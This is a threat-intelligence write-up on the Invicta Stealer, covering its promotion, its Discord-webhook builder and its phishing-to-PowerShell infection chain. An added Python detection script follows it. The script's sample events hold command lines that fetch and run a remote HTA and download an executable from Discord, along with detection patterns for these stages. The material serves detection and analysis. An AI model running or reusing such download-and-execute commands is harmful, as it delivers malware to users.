Threat Actor Releases Free Builder to Boost Popularity and Inflict Damage

It is apparent from past evidence that threat actors (TAs) utilize social media platforms to demonstrate their technical expertise to attract potential allies or customers interested in acquiring or leasing malware families such as Stealers, Ransomware, RATs, and similar tools. The primary motivation behind such actions is to generate monetary gains or seek collaborations for engaging in highly profitable cyber-attacks. This pattern underscores the role of social media as a tool for connecting with like-minded individuals and facilitating the pursuit of lucrative cybercrime activities.

Cyble Research and Intelligence Labs (CRIL) came across a new stealer named Invicta Stealer. The developer behind this malware is extensively engaged on social media platforms, utilizing them to promote their information stealer and its lethal capabilities. The figure below shows the Telegram channel created by the TAs to promote the stealer.

Figure 1 – Invicta Stealer Telegram Channel

Additionally, the TA has created a YouTube channel where they demonstrate a video tutorial detailing the steps to create the Invicta Stealer executable using a builder tool available in the GitHub repository. The Invicta Stealer can collect system information, system hardware details, wallet data, and browser data, and extract information from applications like Steam and Discord. The GitHub post by the TA, illustrated in the figure below, highlights their active promotion of the Invicta Stealer and its functionalities.

Figure 2 – GitHub Post of Invicta Stealer

The GitHub post includes a noteworthy detail: the malware developer generously offers a free stealer builder alongside the provided information. When running the builder executable, users are prompted to input a Discord webhook or server URL, which serves as the command and control (C&C) mechanism. The figure below illustrates the Invicta Stealer builder.

Figure 3 – Invicta Stealer Builder

CRIL has noticed a significant increase in the prevalence of the Invicta Stealer due to the availability of its builder on the GitHub page, leading to numerous TAs actively employing it to infect unsuspecting users. The figure below shows the statistics of Invicta Stealer samples identified in the wild.

Figure 4 – Increased Activity of Invicta Stealer

The infection begins with a spam email carrying a deceptive HTML page designed to appear as an authentic refund invoice from GoDaddy, aiming to trick the recipients. The figure below shows the phishing HTML page.

Upon opening the phishing HTML page, users are instantly redirected to a Discord URL, initiating the download of a file named “Invoice.zip”. The figure below illustrates the HTML page’s redirection to the Discord URL to download “Invoice.zip”.

Figure 6 – Browser Redirecting to Download Compressed File

Inside the “Invoice.zip” archive file, there is a shortcut file named “INVOICE_MT103.lnk”. When the LNK file is executed, it triggers a PowerShell command that runs an HTA file hosted on the TAs’ Discord server.

Figure 7 – Details of the Malicious Link File

This HTA file contains VBScript code that, in turn, executes a PowerShell script. The PowerShell script is responsible for downloading the Invicta Stealer, disguised as “Invoice_MT103_Payment.exe”. The figure below shows the malicious PowerShell command.

The figure below depicts the entire infection chain of the Invicta Stealer, illustrating the step-by-step progression from the initial infection to the delivery of the final payload.

Figure 9 – Invicta Stealer Infection Chain

For our analysis of Invicta Stealer capabilities, we obtained a 64-bit GUI binary of the malicious Invicta Stealer from the wild.
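The delivery chain described above (HTML lure, Discord-hosted ZIP, LNK, PowerShell, remote HTA, second PowerShell stage, dropped executable) and the builder's Discord-webhook C&C leave a recognisable process lineage on the endpoint. The script below is an added detection example, not code from Cyble or from the stealer's author: it scores a set of process-creation events for each stage of that chain and reconstructs the parent chain of the final binary for triage. The events, paths and URLs in it are constructed sample data, not indicators taken from real telemetry; the only real domains are the public Discord ones.

```python
"""Added detection example for the Invicta Stealer delivery chain.
Not Cyble's code; sample events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the process image
    cmdline: str   # command line recorded by the endpoint sensor


# Public Discord hosts used for attachments and for webhook C&C.
DISCORD_URL = re.compile(r"https?://(?:cdn\.)?discord(?:app)?\.com/\S+", re.I)
DISCORD_WEBHOOK = re.compile(r"https?://discord(?:app)?\.com/api/webhooks/\S+", re.I)
REMOTE_HTA = re.compile(r"https?://\S+\.hta", re.I)
REMOTE_EXE = re.compile(r"https?://\S+?\.exe\b", re.I)
USER_WRITABLE = re.compile(r"\\(?:temp|downloads)\\", re.I)

# Constructed sample events (not real logs): one lure chain plus benign admin use.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "mshta https://cdn.discordapp.com/attachments/000/000/inv.hta"'),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://cdn.discordapp.com/attachments/000/000/inv.hta"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c iwr https://cdn.discordapp.com/attachments/000/000/Invoice_MT103_Payment.exe "
              r"-OutFile C:\Users\victim\AppData\Local\Temp\Invoice_MT103_Payment.exe"),
    ProcEvent(500, 400, r"C:\Users\victim\AppData\Local\Temp\Invoice_MT103_Payment.exe",
              "Invoice_MT103_Payment.exe"),
    # Benign contrast: an interactive PowerShell session with no remote content.
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Process"),
]


def base(image: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (pid, reason) findings for each stage of the chain seen in events."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = base(e.image)
        parent = by_pid.get(e.ppid)
        pname = base(parent.image) if parent else ""
        # Stage 1: PowerShell launched from Explorer (shortcut lure) with a Discord URL.
        if name == "powershell.exe" and pname == "explorer.exe" and DISCORD_URL.search(e.cmdline):
            findings.append((e.pid, "explorer->powershell with Discord URL (LNK lure)"))
        # Stage 2: mshta fetching an HTA from a remote host instead of a local file.
        if name == "mshta.exe" and REMOTE_HTA.search(e.cmdline):
            findings.append((e.pid, "mshta executing remote HTA"))
        # Stage 3: PowerShell spawned by mshta, i.e. the VBScript inside the HTA.
        if name == "powershell.exe" and pname == "mshta.exe":
            findings.append((e.pid, "powershell spawned by mshta"))
        # Stage 4: PowerShell pulling an executable from Discord-hosted storage.
        if name == "powershell.exe" and DISCORD_URL.search(e.cmdline) and REMOTE_EXE.search(e.cmdline):
            findings.append((e.pid, "powershell downloading EXE from Discord"))
        # Stage 5: a binary run by PowerShell from a user-writable drop location.
        if pname == "powershell.exe" and USER_WRITABLE.search(e.image):
            findings.append((e.pid, "powershell launched binary from temp/downloads path"))
        # Builder C&C: a Discord webhook URL anywhere on a command line.
        if DISCORD_WEBHOOK.search(e.cmdline):
            findings.append((e.pid, "Discord webhook URL on command line (possible C&C)"))
    return findings


def lineage(pid, events):
    """Image names from the oldest known ancestor down to pid, for analyst triage."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(base(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


if __name__ == "__main__":
    for pid, reason in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
    print("lineage of final binary:", " -> ".join(lineage(500, SAMPLE_EVENTS)))
```

Each rule fires on one stage independently, so a partial chain (for example a blocked download) still produces findings; correlating several stages under one lineage, as `lineage` does for the dropped binary, is what separates the lure from the benign PowerShell session in the sample, which yields no finding at all.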